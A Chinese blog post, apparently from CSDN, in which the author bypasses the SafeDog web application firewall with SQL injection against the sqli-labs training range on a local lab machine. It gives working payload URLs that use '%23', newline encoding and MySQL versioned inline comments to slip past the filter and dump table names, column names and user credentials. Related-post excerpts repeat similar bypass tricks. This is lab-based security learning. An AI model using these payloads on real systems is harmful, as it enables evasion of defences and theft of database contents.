记一次SQL注入绕过安全狗

已于 2023-05-27 18:37:18 修改
阅读量223 收藏 1
点赞数
分类专栏: Web安全 文章标签: sql 安全 网络安全
于 2023-05-26 11:52:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51641247/article/details/130882576
版权

环境搭建

phpstudy搭建Apache+php 下sqli-lib靶场。

网站安全狗Apache版本4.0

绕过思路

正常注入思路: 

  1. 判断闭合字符
  2. 判断注入类型
  3. 查询列数
  4. 判断回显位
  5. 查询数据库的基本信息
  6. 爆数据库名
  7. 爆数据库表名
  8. 爆字段名
  9. 爆值

而常见的sql绕waf的方法有:

  1. 大小写,
  2. 加密解密
  3. 编码解码
  4. 等价函数
  5. 特殊符号
  6. 注释符混用

操作步骤

1.以sqli第一关为例:首先判断闭合字符

2.使用order by 判断列数 ,正常的语句被拦截,无法回显

 3.使用内联注释尝试绕过waf,/*! */会干扰waf进行检测数据

安全狗更新之后,所有的payload都已经失效,但是经过多次尝试后,发现“#”字符有着特殊之处

我们的语句发送过去,首先接收安全狗检测,安全狗检测到'#'号,所以'\#'后面的都会被截断抛弃,所以安全狗只能匹配到'\#'前的order,但是没匹配到'\#'后的by,最终导致语句不完整导致最后的报错。 #的编码为%23

构造如下语句后,发现数据库没有读取到by 3,只读到了order的值

 尝试以下语句 ,页面正常,说明在构造语句前加“%23”可以绕过检测,并且判断出列数为三

或者使用另一种语句  group by 判断列数

http://192.168.249.131/sqli/Less-1/?id=1' "%23"/*!12444order */ %0a /*!12444by 3*/
-- +

 4.接着判断显示位,通过前边尝试构造的语句,可以轻松构造payload,成功获得显示位2,3

 注意 改为-1,或构造为假的条件(and 1=2)

5.爆出数据库信息和版本

 语句中带有database(),被拦截,但是database没有进行拦截,说明database和()之间不能连用

构造语句为
http://192.168.249.131/sqli/Less-1/?id=-1'"%23" /*!12444union */ %0a /*!12444select*/ 1,database(/*!12444*/),version(/*!12444*/)
-- +

 6.爆出数据库名后,尝试爆表名

http://192.168.249.131/sqli/Less-1/?id=-1'  "%23" /*!12444union */ %0a /*!12444select*/ 1,database(/*!12444*/),group_concat(table_name) from information_schema.tables where table_schema="security"

 7.接着尝试爆出users表下的字段值 ,构造语句后,发现被拦截,经过测试发现 and被过滤

尝试 /*!12444and*/

http://192.168.249.131/sqli/Less-1/?id=-1'  "%23" /*!12444union */ %0a /*!12444select*/ 1,database(/*!12444*/),group_concat(column_name) from information_schema.columns where table_schema="security" /*!12444and*/
 table_name="users"

 8.接着就是爆出字段中的值了

http://192.168.249.131/sqli/Less-1/?id=-1'  "%23" /*!12444union */ %0a /*!12444select*/ 1,database(/*!12444*/),group_concat(username,password) from users

总结

1、内联注释 可以绕过大多数情况

2、在一些被拦截的地方多用/\*%23\*/和/\*!10440%0a\*/,有奇效。

%23为#编码,%0A为换行 

一般来说,内联注释只有在紧跟版本号的情况下才有意义,其主要目的是通过版本号来控制部分语句在不同 MySQL 版本下的执行情况

 绕过原因:安全狗误以为/**/是注释的内容所以全部忽略。

-飞飞鱼
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入绕过技术1
08-03
2.十六进制编码 3.Unicode编码 1.普通注释 2.内联注释 1.函数或变量 2.符号 3.生僻函数 1.使用反引号 ,例如select version
SQL注入-绕过安全狗
LJH1999ZN的博客
02-15 4985
绕过安全狗的常见四种方式 id=1'/*!44444order*/ /*!44444by*/3--+
黑客常用SQL注入绕过技术总结!(冰河吐血整理,建议收藏)
最新发布
2401_84264536的博客
04-27 1066
最后的or '1闭合查询语句的最后的单引号,或者:id=1’ union select 1,2,'3使用like 、rlike 、regexp 或者 使用< 或者 >(1)使用注释绕过常用注释符://,-- , /**/, #, --+, – -, ;,%00,–a用法:U// NION // SE// LECT //user,pwd from user(2)使用大小写绕过id=-1’UnIoN/**/SeLeCT(3)内联注释绕过id=-1’/!UnIoN/ SeLeCT 1,2,concat(/!ta
聊一聊SQL注入常用绕WAF小技巧
Javachichi的博客
02-08 1468
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
sql注入绕过安全狗
weixin_48776804的博客
02-15 555
sql注入安全狗
实战|一次艰难的SQL注入(过安全狗)
weixin_68789096的博客
06-27 172
最近在挖补天的src,然后挖出了不少SQL注入,完了出了数据库名就不管那么多提交了。今天挖了个报错注入的,突然一激灵,说我不能这样颓废下去了,刚好是个后台登录的界面,我决心要登进它的后台。
【Web安全sql注入绕过技法
likinguuu的博客
11-25 1105
【Web安全sql注入绕过技法
SQL注入绕过手段
weixin_46709219的博客
12-27 2275
一)SQL注入绕过手段 1)大小写绕过 2)双写绕过 3)编码绕过 4)内联注释绕过 ———————————————————————————————————————————————————————— 一)SQL注入绕过手段 1)大小写绕过 如果程序中设置了过滤关键字但是过滤过程中并没有对关键字组成进行深入分析过滤,导致只是对整体进行过滤。例如:and 过滤,也就是说只是发现关键字出现并不会对关键字处理,对于这种方式的过滤我们可以采用“ 大小写绕过 ”这种过滤措施,例如:And 1=1 ,OrdEr
安全狗绕过
alien0011的博客
06-09 3430
安全狗绕过(截至6.8号) 环境: phpstudy2018 安全狗apache版 sqllabs靶场 安全狗绕过思路: 安全狗是基于正则匹配的绕过,所以总是能够绕过其正则匹配实现sql的命令执行,需要对数据库语句灵活掌握。经过对安全狗的fuzz,测试其拦截规则,发现其实and、or这样的敏感字符是不会被直接拦截的,但是and加空格就会被拦截,其实绕过的中心可以向如何绕过空格偏移。 为了可以更清晰的认知注入语句是如何在数据库中执行的,我修改了sqli-lab的代...
SQL注入绕过安全狗
blackguest07的博客
01-12 2221
SQL注入绕过安全狗,内容很详细,本文仅供学习,请勿做一些非法事情,出事与博主无关。
web安全-SQL注入-认识安全狗-WAF绕过常用方法以及示例
ran的博客
01-20 1583
特殊符号%00,部分 waf 遇到%00 截断,只能获取到前面的参数,无法获取到后面的有害参数输 入 , 从 而 导 致 Bypass。select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin。mysql 注释符有三种:#、/*...*/、-- ... (注意--后面有一个空格)// -- --+ # /**/ + :%00 /!Hex() bin() 等价于 ascii()
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
绕过安全狗继续注入的思路
08-30
绕过安全狗继续注入的思路。
SQL注入绕过实战案例
08-31
SQL sqli-labs-master 靶场搭建
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
SQL注入Bypass安全狗4.0.pdf
04-08
SQL注入攻击绕过安全狗4.0 SQL注入攻击是常见的Web应用安全漏洞之一,攻击者可以通过操纵SQL语句来访问或修改数据库中的数据。安全狗4.0是一款Web应用防火墙,可以检测和防止SQL注入攻击。但是,攻击者可以使用各种...
sql注入篇--绕过WAF
qq_51003021的博客
08-12 2029
针对WAF的绕过
sql注入(三)绕过方法及防御手段
Innocence_0的博客
03-07 1339
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
安全狗SQL注入绕过
qq_38675102的博客
02-09 2358
安全狗waf绕过
sql注入绕过防火墙
12-01
为了绕过防火墙的SQL注入,可以使用一些技巧和方法,例如: 1. 双写绕过:在SQL注入语句中,将关键字双写,例如将SELECT写成SSELECT,将UNION写成UUNION,这样可以绕过一些简单的防火墙。 2. 使用特殊字符:在SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值